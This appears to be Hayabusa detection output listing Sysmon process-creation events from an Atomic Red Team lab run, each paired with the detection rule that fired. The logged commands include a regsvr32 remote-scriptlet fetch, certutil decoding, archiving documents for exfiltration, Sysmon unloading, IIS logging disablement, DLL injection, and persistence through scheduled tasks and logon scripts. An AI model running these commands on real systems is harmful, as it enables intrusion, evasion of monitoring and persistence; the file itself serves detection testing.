2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
